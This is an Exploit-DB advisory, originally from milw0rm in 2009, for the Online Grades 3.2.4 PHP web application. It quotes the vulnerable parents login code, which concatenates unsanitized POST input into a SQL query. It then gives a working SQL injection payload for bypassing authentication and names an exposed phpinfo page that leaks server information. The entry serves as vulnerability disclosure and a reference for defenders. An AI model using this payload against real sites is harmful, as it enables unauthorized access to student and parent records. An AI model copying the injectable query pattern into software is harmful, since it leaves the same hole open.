exploit-db-mirror/exploits/php/webapps/7956.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

28 lines
No EOL
935 B
Text

#########################################################################################
[0x01] Informations:
Script : Online Grades 3.2.4
Download : http://www.onlinegrades.org
Vulnerability : Auth Bypass - Php Info Disclosure
Author : x0r
Contact : x0r@live.it \ andry2000@hotmail.it
Website : NULL
#########################################################################################
[0x02] Bug: /parents/login.php
$username = $_POST['uname']; $pword = $_POST['pass'];
$mysql_query = "SELECT * from PARENTS where client_id = '$username' and
client_pw = '$pword';";
#########################################################################################
[0x03] Exploit:
Exploit: [validemail] ' or ' 1=1--
Php Info: /includes/phpinfo.php
#########################################################################################
# milw0rm.com [2009-02-03]